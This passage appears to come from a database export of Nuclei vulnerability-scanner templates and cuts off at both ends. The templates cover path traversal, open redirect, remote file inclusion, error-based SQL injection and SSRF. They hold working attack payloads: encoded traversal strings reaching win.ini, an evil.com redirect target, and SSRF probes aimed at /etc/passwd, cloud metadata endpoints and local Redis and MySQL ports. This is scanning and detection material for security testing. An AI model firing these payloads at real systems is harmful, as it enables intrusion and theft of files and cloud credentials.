'/..///////..////..//////windows/win.ini'\n - '/../../../../../../../../../windows/win.ini'\n - './../../../../../../../../../../windows/win.ini'\n - '/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini'\n - '/.../.../.../.../.../.../.../.../.../windows/win.ini'\n - '/..../..../..../..../..../..../..../..../..../windows/win.ini'\n - '/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini'\n - '\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\win.ini'\n - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'\n - '..%2f..%2f..%2f..%2fwindows/win.ini'\n - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'\n - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'\n - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'\n - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'\n - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'\n - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'\n - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'\n - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'\n - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'\n - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'\n - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'\n - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'\n - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini'\n - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'\n 
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'\n - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'\n - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'\n\n fuzzing:\n - part: query\n type: replace # replaces existing parameter value with fuzz payload\n mode: multiple # replaces all parameters value with fuzz payload\n fuzz:\n - '{{win_fuzz}}'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a00463044022061480301387935155bae9c0e84b58e21d4d9f1051b2e5fd9954c1397fdd9b67202204b03f96125fa3991ac2a30b43dac7a140a9ec509131b4203cd15efe2179f3b4a:922c64590222798bb761d5b6d8e72950", "hash": "f7ff7a534f136638f9d254f3cd7c4705", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c88" }, "name": "open-redirect.yaml", "content": "id: open-redirect\n\ninfo:\n name: Open Redirect Detection\n author: princechaddha\n severity: medium\n tags: redirect,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n redirect:\n - \"evil.com\"\n\n fuzzing:\n - part: query\n mode: single\n keys:\n - AuthState\n - URL\n - _url\n - callback\n - checkout\n - checkout_url\n - content\n - continue\n - continueTo\n - counturl\n - data\n - dest\n - dest_url\n - destination\n - dir\n - document\n - domain\n - done\n - download\n - feed\n - file\n - file_name\n - file_url\n - folder\n - folder_url\n - forward\n - from_url\n - go\n - goto\n - host\n - html\n - http\n - https\n - image\n - image_src\n - image_url\n - imageurl\n - img\n - img_url\n - include\n - langTo\n 
- load_file\n - load_url\n - login_to\n - login_url\n - logout\n - media\n - navigation\n - next\n - next_page\n - open\n - out\n - page\n - page_url\n - pageurl\n - path\n - picture\n - port\n - proxy\n - r\n - r2\n - redir\n - redirect\n - redirectUri\n - redirectUrl\n - redirect_to\n - redirect_uri\n - redirect_url\n - reference\n - referrer\n - req\n - request\n - ret\n - retUrl\n - return\n - returnTo\n - return_path\n - return_to\n - return_url\n - rt\n - rurl\n - show\n - site\n - source\n - src\n - target\n - to\n - u\n - uri\n - url\n - val\n - validate\n - view\n - window\n - back\n - cgi\n - follow\n - home\n - jump\n - link\n - location\n - menu\n - move\n - nav\n - orig_url\n - out_url\n - query\n - auth\n - callback_url\n - confirm_url\n - destination_url\n - domain_url\n - entry\n - exit\n - forward_url\n - go_to\n - goto_url\n - home_url\n - image_link\n - load\n - logout_url\n - nav_to\n - origin\n - page_link\n - redirect_link\n - ref\n - referrer_url\n - return_link\n - return_to_url\n - source_url\n - target_url\n - to_url\n - validate_url\n - DirectTo\n - relay\n\n fuzz:\n - \"https://{{redirect}}\"\n\n - part: query\n mode: single\n values:\n - \"https?://\" # Replace HTTP URLs with alternatives\n fuzz:\n - \"https://{{redirect}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)evil\\.com\\/?(\\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1\n\n - type: status\n status:\n - 301\n - 302\n - 307\n# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950", "hash": "4267f880d0886742b5af12a11a146a6e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c89" }, "name": "generic-rfi.yaml", "content": "id: 
generic-rfi\n\ninfo:\n name: Generic Remote File Inclusion\n author: m4lwhere\n severity: high\n reference:\n - https://www.invicti.com/learn/remote-file-inclusion-rfi/\n tags: rfi,dast,oast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n rfi:\n - \"https://rfi.nessus.org/rfi.txt\"\n\n fuzzing:\n - part: query\n mode: single\n fuzz:\n - \"{{rfi}}\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body # Confirms the PHP was executed\n words:\n - \"NessusCodeExecTest\"\n# digest: 490a0046304402201f706bb5944d3a4a5ee6f4a6920de5a04d097d9a8abaa3a4b3fc992dc96b97c6022059107f23f16f0e83e38f27702bf6184e2a17c11940d204a50a060879c932a76e:922c64590222798bb761d5b6d8e72950", "hash": "4a0c4b4612991555282b04f7a6418f01", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8a" }, "name": "sqli-error-based.yaml", "content": "id: sqli-error-based\n\ninfo:\n name: Error based SQL Injection\n author: geeknik,pdteam\n severity: critical\n description: |\n Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data,\n or to override valuable ones, or even to execute dangerous system level commands on the database host.\n This is accomplished by the application taking user input and combining it with static parameters to build an SQL query .\n tags: sqli,error,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n injection:\n - \"'\"\n - \"\\\"\"\n - \";\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{injection}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Adminer\"\n negative: true\n # False Positive\n\n - type: regex\n regex:\n # MySQL\n - \"SQL syntax.*?MySQL\"\n - \"Warning.*?\\\\Wmysqli?_\"\n - \"MySQLSyntaxErrorException\"\n - \"valid MySQL result\"\n - \"check the manual that (corresponds to|fits) your MySQL 
server version\"\n - \"Unknown column '[^ ]+' in 'field list'\"\n - \"MySqlClient\\\\.\"\n - \"com\\\\.mysql\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Mysqli_Exception\"\n - \"Pdo[./_\\\\\\\\]Mysql\"\n - \"MySqlException\"\n - \"SQLSTATE\\\\[\\\\d+\\\\]: Syntax error or access violation\"\n # MariaDB\n - \"check the manual that (corresponds to|fits) your MariaDB server version\"\n # Drizzle\n - \"check the manual that (corresponds to|fits) your Drizzle server version\"\n # MemSQL\n - \"MemSQL does not support this type of query\"\n - \"is not supported by MemSQL\"\n - \"unsupported nested scalar subselect\"\n # PostgreSQL\n - \"PostgreSQL.*?ERROR\"\n - \"Warning.*?\\\\Wpg_\"\n - \"valid PostgreSQL result\"\n - \"Npgsql\\\\.\"\n - \"PG::SyntaxError:\"\n - \"org\\\\.postgresql\\\\.util\\\\.PSQLException\"\n - \"ERROR:\\\\s\\\\ssyntax error at or near\"\n - \"ERROR: parser: parse error at or near\"\n - \"PostgreSQL query failed\"\n - \"org\\\\.postgresql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Pgsql\"\n - \"PSQLException\"\n # Microsoft SQL Server\n - \"Driver.*? SQL[\\\\-\\\\_\\\\ ]*Server\"\n - \"OLE DB.*? 
SQL Server\"\n - \"\\\\bSQL Server[^<"]+Driver\"\n - \"Warning.*?\\\\W(mssql|sqlsrv)_\"\n - \"\\\\bSQL Server[^<"]+[0-9a-fA-F]{8}\"\n - \"System\\\\.Data\\\\.SqlClient\\\\.SqlException\\\\.(SqlException|SqlConnection\\\\.OnError)\"\n - \"(?s)Exception.*?\\\\bRoadhouse\\\\.Cms\\\\.\"\n - \"Microsoft SQL Native Client error '[0-9a-fA-F]{8}\"\n - \"\\\\[SQL Server\\\\]\"\n - \"ODBC SQL Server Driver\"\n - \"ODBC Driver \\\\d+ for SQL Server\"\n - \"SQLServer JDBC Driver\"\n - \"com\\\\.jnetdirect\\\\.jsql\"\n - \"macromedia\\\\.jdbc\\\\.sqlserver\"\n - \"Zend_Db_(Adapter|Statement)_Sqlsrv_Exception\"\n - \"com\\\\.microsoft\\\\.sqlserver\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\](Mssql|SqlSrv)\"\n - \"SQL(Srv|Server)Exception\"\n - \"Unclosed quotation mark after the character string\"\n # Microsoft Access\n - \"Microsoft Access (\\\\d+ )?Driver\"\n - \"JET Database Engine\"\n - \"Access Database Engine\"\n - \"ODBC Microsoft Access\"\n - \"Syntax error \\\\(missing operator\\\\) in query expression\"\n # Oracle\n - \"\\\\bORA-\\\\d{5}\"\n - \"Oracle error\"\n - \"Oracle.*?Driver\"\n - \"Warning.*?\\\\W(oci|ora)_\"\n - \"quoted string not properly terminated\"\n - \"SQL command not properly ended\"\n - \"macromedia\\\\.jdbc\\\\.oracle\"\n - \"oracle\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Oracle_Exception\"\n - \"Pdo[./_\\\\\\\\](Oracle|OCI)\"\n - \"OracleException\"\n # IBM DB2\n - \"CLI Driver.*?DB2\"\n - \"DB2 SQL error\"\n - \"\\\\bdb2_\\\\w+\\\\(\"\n - \"SQLCODE[=:\\\\d, -]+SQLSTATE\"\n - \"com\\\\.ibm\\\\.db2\\\\.jcc\"\n - \"Zend_Db_(Adapter|Statement)_Db2_Exception\"\n - \"Pdo[./_\\\\\\\\]Ibm\"\n - \"DB2Exception\"\n - \"ibm_db_dbi\\\\.ProgrammingError\"\n # Informix\n - \"Warning.*?\\\\Wifx_\"\n - \"Exception.*?Informix\"\n - \"Informix ODBC Driver\"\n - \"ODBC Informix driver\"\n - \"com\\\\.informix\\\\.jdbc\"\n - \"weblogic\\\\.jdbc\\\\.informix\"\n - \"Pdo[./_\\\\\\\\]Informix\"\n - \"IfxException\"\n # Firebird\n - \"Dynamic SQL Error\"\n - 
\"Warning.*?\\\\Wibase_\"\n - \"org\\\\.firebirdsql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Firebird\"\n # SQLite\n - \"SQLite/JDBCDriver\"\n - \"SQLite\\\\.Exception\"\n - \"(Microsoft|System)\\\\.Data\\\\.SQLite\\\\.SQLiteException\"\n - \"Warning.*?\\\\W(sqlite_|SQLite3::)\"\n - \"\\\\[SQLITE_ERROR\\\\]\"\n - \"SQLite error \\\\d+:\"\n - \"sqlite3.OperationalError:\"\n - \"SQLite3::SQLException\"\n - \"org\\\\.sqlite\\\\.JDBC\"\n - \"Pdo[./_\\\\\\\\]Sqlite\"\n - \"SQLiteException\"\n # SAP MaxDB\n - \"SQL error.*?POS([0-9]+)\"\n - \"Warning.*?\\\\Wmaxdb_\"\n - \"DriverSapDB\"\n - \"-3014.*?Invalid end of SQL statement\"\n - \"com\\\\.sap\\\\.dbtech\\\\.jdbc\"\n - \"\\\\[-3008\\\\].*?: Invalid keyword or missing delimiter\"\n # Sybase\n - \"Warning.*?\\\\Wsybase_\"\n - \"Sybase message\"\n - \"Sybase.*?Server message\"\n - \"SybSQLException\"\n - \"Sybase\\\\.Data\\\\.AseClient\"\n - \"com\\\\.sybase\\\\.jdbc\"\n # Ingres\n - \"Warning.*?\\\\Wingres_\"\n - \"Ingres SQLSTATE\"\n - \"Ingres\\\\W.*?Driver\"\n - \"com\\\\.ingres\\\\.gcf\\\\.jdbc\"\n # FrontBase\n - \"Exception (condition )?\\\\d+\\\\. Transaction rollback\"\n - \"com\\\\.frontbase\\\\.jdbc\"\n - \"Syntax error 1. 
Missing\"\n - \"(Semantic|Syntax) error [1-4]\\\\d{2}\\\\.\"\n # HSQLDB\n - \"Unexpected end of command in statement \\\\[\"\n - \"Unexpected token.*?in statement \\\\[\"\n - \"org\\\\.hsqldb\\\\.jdbc\"\n # H2\n - \"org\\\\.h2\\\\.jdbc\"\n - \"\\\\[42000-192\\\\]\"\n # MonetDB\n - \"![0-9]{5}![^\\\\n]+(failed|unexpected|error|syntax|expected|violation|exception)\"\n - \"\\\\[MonetDB\\\\]\\\\[ODBC Driver\"\n - \"nl\\\\.cwi\\\\.monetdb\\\\.jdbc\"\n # Apache Derby\n - \"Syntax error: Encountered\"\n - \"org\\\\.apache\\\\.derby\"\n - \"ERROR 42X01\"\n # Vertica\n - \", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):\"\n - \"/vertica/Parser/scan\"\n - \"com\\\\.vertica\\\\.jdbc\"\n - \"org\\\\.jkiss\\\\.dbeaver\\\\.ext\\\\.vertica\"\n - \"com\\\\.vertica\\\\.dsi\\\\.dataengine\"\n # Mckoi\n - \"com\\\\.mckoi\\\\.JDBCDriver\"\n - \"com\\\\.mckoi\\\\.database\\\\.jdbc\"\n - \"<REGEX_LITERAL>\"\n # Presto\n - \"com\\\\.facebook\\\\.presto\\\\.jdbc\"\n - \"io\\\\.prestosql\\\\.jdbc\"\n - \"com\\\\.simba\\\\.presto\\\\.jdbc\"\n - \"UNION query has different number of fields: \\\\d+, \\\\d+\"\n # Altibase\n - \"Altibase\\\\.jdbc\\\\.driver\"\n # MimerSQL\n - \"com\\\\.mimer\\\\.jdbc\"\n - \"Syntax error,[^\\\\n]+assumed to mean\"\n # CrateDB\n - \"io\\\\.crate\\\\.client\\\\.jdbc\"\n # Cache\n - \"encountered after end of query\"\n - \"A comparison operator is required here\"\n # Raima Database Manager\n - \"-10048: Syntax error\"\n - \"rdmStmtPrepare\\\\(.+?\\\\) returned\"\n # Virtuoso\n - \"SQ074: Line \\\\d+:\"\n - \"SR185: Undefined procedure\"\n - \"SQ200: No table \"\n - \"Virtuoso S0002 Error\"\n - \"\\\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\\\]\\\\[Virtuoso Server\\\\]\"\n condition: or\n\n extractors:\n - type: regex\n name: mysql\n regex:\n - \"SQL syntax.*?MySQL\"\n - \"Warning.*?\\\\Wmysqli?_\"\n - \"MySQLSyntaxErrorException\"\n - \"valid MySQL result\"\n - \"check the manual that (corresponds to|fits) your MySQL server version\"\n - \"Unknown column '[^ 
]+' in 'field list'\"\n - \"MySqlClient\\\\.\"\n - \"com\\\\.mysql\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Mysqli_Exception\"\n - \"Pdo[./_\\\\\\\\]Mysql\"\n - \"MySqlException\"\n - \"SQLSTATE[\\\\d+]: Syntax error or access violation\"\n\n - type: regex\n name: mariadb\n regex:\n - \"check the manual that (corresponds to|fits) your MariaDB server version\"\n\n - type: regex\n name: drizzel\n regex:\n - \"check the manual that (corresponds to|fits) your Drizzle server version\"\n\n - type: regex\n name: memsql\n regex:\n - \"MemSQL does not support this type of query\"\n - \"is not supported by MemSQL\"\n - \"unsupported nested scalar subselect\"\n\n - type: regex\n name: postgresql\n regex:\n - \"PostgreSQL.*?ERROR\"\n - \"Warning.*?\\\\Wpg_\"\n - \"valid PostgreSQL result\"\n - \"Npgsql\\\\.\"\n - \"PG::SyntaxError:\"\n - \"org\\\\.postgresql\\\\.util\\\\.PSQLException\"\n - \"ERROR:\\\\s\\\\ssyntax error at or near\"\n - \"ERROR: parser: parse error at or near\"\n - \"PostgreSQL query failed\"\n - \"org\\\\.postgresql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Pgsql\"\n - \"PSQLException\"\n\n - type: regex\n name: microsoftsqlserver\n regex:\n - \"Driver.*? SQL[\\\\-\\\\_\\\\ ]*Server\"\n - \"OLE DB.*? 
SQL Server\"\n - \"\\\\bSQL Server[^<"]+Driver\"\n - \"Warning.*?\\\\W(mssql|sqlsrv)_\"\n - \"\\\\bSQL Server[^<"]+[0-9a-fA-F]{8}\"\n - \"System\\\\.Data\\\\.SqlClient\\\\.SqlException\\\\.(SqlException|SqlConnection\\\\.OnError)\"\n - \"(?s)Exception.*?\\\\bRoadhouse\\\\.Cms\\\\.\"\n - \"Microsoft SQL Native Client error '[0-9a-fA-F]{8}\"\n - \"\\\\[SQL Server\\\\]\"\n - \"ODBC SQL Server Driver\"\n - \"ODBC Driver \\\\d+ for SQL Server\"\n - \"SQLServer JDBC Driver\"\n - \"com\\\\.jnetdirect\\\\.jsql\"\n - \"macromedia\\\\.jdbc\\\\.sqlserver\"\n - \"Zend_Db_(Adapter|Statement)_Sqlsrv_Exception\"\n - \"com\\\\.microsoft\\\\.sqlserver\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\](Mssql|SqlSrv)\"\n - \"SQL(Srv|Server)Exception\"\n - \"Unclosed quotation mark after the character string\"\n\n - type: regex\n name: microsoftaccess\n regex:\n - \"Microsoft Access (\\\\d+ )?Driver\"\n - \"JET Database Engine\"\n - \"Access Database Engine\"\n - \"ODBC Microsoft Access\"\n - \"Syntax error \\\\(missing operator\\\\) in query expression\"\n\n - type: regex\n name: oracle\n regex:\n - \"\\\\bORA-\\\\d{5}\"\n - \"Oracle error\"\n - \"Oracle.*?Driver\"\n - \"Warning.*?\\\\W(oci|ora)_\"\n - \"quoted string not properly terminated\"\n - \"SQL command not properly ended\"\n - \"macromedia\\\\.jdbc\\\\.oracle\"\n - \"oracle\\\\.jdbc\"\n - \"Zend_Db_(Adapter|Statement)_Oracle_Exception\"\n - \"Pdo[./_\\\\\\\\](Oracle|OCI)\"\n - \"OracleException\"\n\n - type: regex\n name: ibmdb2\n regex:\n - \"CLI Driver.*?DB2\"\n - \"DB2 SQL error\"\n - \"\\\\bdb2_\\\\w+\\\\(\"\n - \"SQLCODE[=:\\\\d, -]+SQLSTATE\"\n - \"com\\\\.ibm\\\\.db2\\\\.jcc\"\n - \"Zend_Db_(Adapter|Statement)_Db2_Exception\"\n - \"Pdo[./_\\\\\\\\]Ibm\"\n - \"DB2Exception\"\n - \"ibm_db_dbi\\\\.ProgrammingError\"\n\n - type: regex\n name: informix\n regex:\n - \"Warning.*?\\\\Wifx_\"\n - \"Exception.*?Informix\"\n - \"Informix ODBC Driver\"\n - \"ODBC Informix driver\"\n - \"com\\\\.informix\\\\.jdbc\"\n - 
\"weblogic\\\\.jdbc\\\\.informix\"\n - \"Pdo[./_\\\\\\\\]Informix\"\n - \"IfxException\"\n\n - type: regex\n name: firebird\n regex:\n - \"Dynamic SQL Error\"\n - \"Warning.*?\\\\Wibase_\"\n - \"org\\\\.firebirdsql\\\\.jdbc\"\n - \"Pdo[./_\\\\\\\\]Firebird\"\n\n - type: regex\n name: sqlite\n regex:\n - \"SQLite/JDBCDriver\"\n - \"SQLite\\\\.Exception\"\n - \"(Microsoft|System)\\\\.Data\\\\.SQLite\\\\.SQLiteException\"\n - \"Warning.*?\\\\W(sqlite_|SQLite3::)\"\n - \"\\\\[SQLITE_ERROR\\\\]\"\n - \"SQLite error \\\\d+:\"\n - \"sqlite3.OperationalError:\"\n - \"SQLite3::SQLException\"\n - \"org\\\\.sqlite\\\\.JDBC\"\n - \"Pdo[./_\\\\\\\\]Sqlite\"\n - \"SQLiteException\"\n\n - type: regex\n name: sapmaxdb\n regex:\n - \"SQL error.*?POS([0-9]+)\"\n - \"Warning.*?\\\\Wmaxdb_\"\n - \"DriverSapDB\"\n - \"-3014.*?Invalid end of SQL statement\"\n - \"com\\\\.sap\\\\.dbtech\\\\.jdbc\"\n - \"\\\\[-3008\\\\].*?: Invalid keyword or missing delimiter\"\n\n - type: regex\n name: sybase\n regex:\n - \"Warning.*?\\\\Wsybase_\"\n - \"Sybase message\"\n - \"Sybase.*?Server message\"\n - \"SybSQLException\"\n - \"Sybase\\\\.Data\\\\.AseClient\"\n - \"com\\\\.sybase\\\\.jdbc\"\n\n - type: regex\n name: ingres\n regex:\n - \"Warning.*?\\\\Wingres_\"\n - \"Ingres SQLSTATE\"\n - \"Ingres\\\\W.*?Driver\"\n - \"com\\\\.ingres\\\\.gcf\\\\.jdbc\"\n\n - type: regex\n name: frontbase\n regex:\n - \"Exception (condition )?\\\\d+\\\\. Transaction rollback\"\n - \"com\\\\.frontbase\\\\.jdbc\"\n - \"Syntax error 1. 
Missing\"\n - \"(Semantic|Syntax) error \\\\[1-4\\\\]\\\\d{2}\\\\.\"\n\n - type: regex\n name: hsqldb\n regex:\n - \"Unexpected end of command in statement \\\\[\"\n - \"Unexpected token.*?in statement \\\\[\"\n - \"org\\\\.hsqldb\\\\.jdbc\"\n\n - type: regex\n name: h2\n regex:\n - \"org\\\\.h2\\\\.jdbc\"\n - \"\\\\[42000-192\\\\]\"\n\n - type: regex\n name: monetdb\n regex:\n - \"![0-9]{5}![^\\\\n]+(failed|unexpected|error|syntax|expected|violation|exception)\"\n - \"\\\\[MonetDB\\\\]\\\\[ODBC Driver\"\n - \"nl\\\\.cwi\\\\.monetdb\\\\.jdbc\"\n\n - type: regex\n name: apachederby\n regex:\n - \"Syntax error: Encountered\"\n - \"org\\\\.apache\\\\.derby\"\n - \"ERROR 42X01\"\n\n - type: regex\n name: vertica\n regex:\n - \", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):\"\n - \"/vertica/Parser/scan\"\n - \"com\\\\.vertica\\\\.jdbc\"\n - \"org\\\\.jkiss\\\\.dbeaver\\\\.ext\\\\.vertica\"\n - \"com\\\\.vertica\\\\.dsi\\\\.dataengine\"\n\n - type: regex\n name: mckoi\n regex:\n - \"com\\\\.mckoi\\\\.JDBCDriver\"\n - \"com\\\\.mckoi\\\\.database\\\\.jdbc\"\n - \"<REGEX_LITERAL>\"\n\n - type: regex\n name: presto\n regex:\n - \"com\\\\.facebook\\\\.presto\\\\.jdbc\"\n - \"io\\\\.prestosql\\\\.jdbc\"\n - \"com\\\\.simba\\\\.presto\\\\.jdbc\"\n - \"UNION query has different number of fields: \\\\d+, \\\\d+\"\n\n - type: regex\n name: altibase\n regex:\n - \"Altibase\\\\.jdbc\\\\.driver\"\n\n - type: regex\n name: mimersql\n regex:\n - \"com\\\\.mimer\\\\.jdbc\"\n - \"Syntax error,[^\\\\n]+assumed to mean\"\n\n - type: regex\n name: cratedb\n regex:\n - \"io\\\\.crate\\\\.client\\\\.jdbc\"\n\n - type: regex\n name: cache\n regex:\n - \"encountered after end of query\"\n - \"A comparison operator is required here\"\n\n - type: regex\n name: raimadatabasemanager\n regex:\n - \"-10048: Syntax error\"\n - \"rdmStmtPrepare\\\\(.+?\\\\) returned\"\n\n - type: regex\n name: virtuoso\n regex:\n - \"SQ074: Line \\\\d+:\"\n - \"SR185: Undefined procedure\"\n - \"SQ200: No table 
\"\n - \"Virtuoso S0002 Error\"\n - \"\\\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\\\]\\\\[Virtuoso Server\\\\]\"\n# digest: 4a0a00473045022100991ee3aa73500a4773ffbc23f50ab000999d53da3f5ab8723a4abc146eba69ee02207ef58106e21c140b29dfabac8270bbe11bd86b7b14f51b785f437e20d1f124de:922c64590222798bb761d5b6d8e72950", "hash": "c8a1ce309d14941b256c497e5e8beec5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8b" }, "name": "blind-ssrf.yaml", "content": "id: blind-ssrf\n\ninfo:\n name: Blind SSRF OAST Detection\n author: pdteam\n severity: medium\n tags: ssrf,dast,oast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n ssrf:\n - \"{{interactsh-url}}\"\n - \"{{FQDN}}.{{interactsh-url}}\"\n - \"{{RDN}}.{{interactsh-url}}\"\n\n fuzzing:\n - part: query\n mode: single\n values:\n - \"https?://\" # Replace HTTP URLs with alternatives\n fuzz:\n - \"https://{{ssrf}}\"\n\n - part: query\n mode: single\n values:\n - \"^[A-Za-z0-9-._]+:[0-9]+$\" # Replace : with alternative\n fuzz:\n - \"{{ssrf}}:80\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450221008e67c53d4368607db787a520c50ce1ae8c742483ea80c0e7d34ab8ef529d2c9902205c049079f166eae9a8e5c5c99b72a048bebaa05de3eb3828adb9d81fab3543aa:922c64590222798bb761d5b6d8e72950", "hash": "fedd9b3ab5aa3a7bc4f5e4f1200bd7b2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8c" }, "name": "response-ssrf.yaml", "content": "id: response-ssrf\n\ninfo:\n name: Full Response SSRF Detection\n author: pdteam,pwnhxl,j4vaovo\n severity: high\n reference:\n - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py\n tags: ssrf,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n ssrf:\n - 'http://{{interactsh-url}}'\n - 'http://{{FQDN}}.{{interactsh-url}}'\n - 
'http://{{RDN}}.{{interactsh-url}}'\n - 'file:////./etc/./passwd'\n - 'file:///c:/./windows/./win.ini'\n - 'http://metadata.tencentyun.com/latest/meta-data/'\n - 'http://100.100.100.200/latest/meta-data/'\n - 'http://169.254.169.254/latest/meta-data/'\n - 'http://169.254.169.254/metadata/v1'\n - 'http://127.0.0.1:22'\n - 'http://127.0.0.1:3306'\n - 'dict://127.0.0.1:6379/info'\n\n fuzzing:\n - part: query\n mode: single\n keys:\n - callback\n - continue\n - data\n - dest\n - dir\n - domain\n - feed\n - file\n - host\n - html\n - imgurl\n - navigation\n - next\n - open\n - out\n - page\n - path\n - port\n - redirect\n - reference\n - return\n - show\n - site\n - to\n - uri\n - url\n - val\n - validate\n - view\n - window\n fuzz:\n - \"{{ssrf}}\"\n\n - part: query\n mode: single\n values:\n - \"(https|http|file)(%3A%2F%2F|://)(.*?)\"\n fuzz:\n - \"{{ssrf}}\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n\n - type: regex\n part: body\n regex:\n - 'SSH-(\\d.\\d)-OpenSSH_(\\d.\\d)'\n\n - type: regex\n part: body\n regex:\n - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'\n\n - type: regex\n part: body\n regex:\n - '(\\d.\\d.\\d)(.*?)mysql_native_password'\n\n - type: regex\n part: body\n regex:\n - 'root:.*?:[0-9]*:[0-9]*:'\n\n - type: word\n part: body\n words:\n - 'for 16-bit app support'\n\n - type: regex\n part: body\n regex:\n - 'dns-conf\\/[\\s\\S]+instance\\/'\n\n - type: regex\n part: body\n regex:\n - 'app-id[\\s\\S]+placement\\/'\n\n - type: regex\n part: body\n regex:\n - 'ami-id[\\s\\S]+placement\\/'\n\n - type: regex\n part: body\n regex:\n - 'id[\\s\\S]+interfaces\\/'\n# digest: 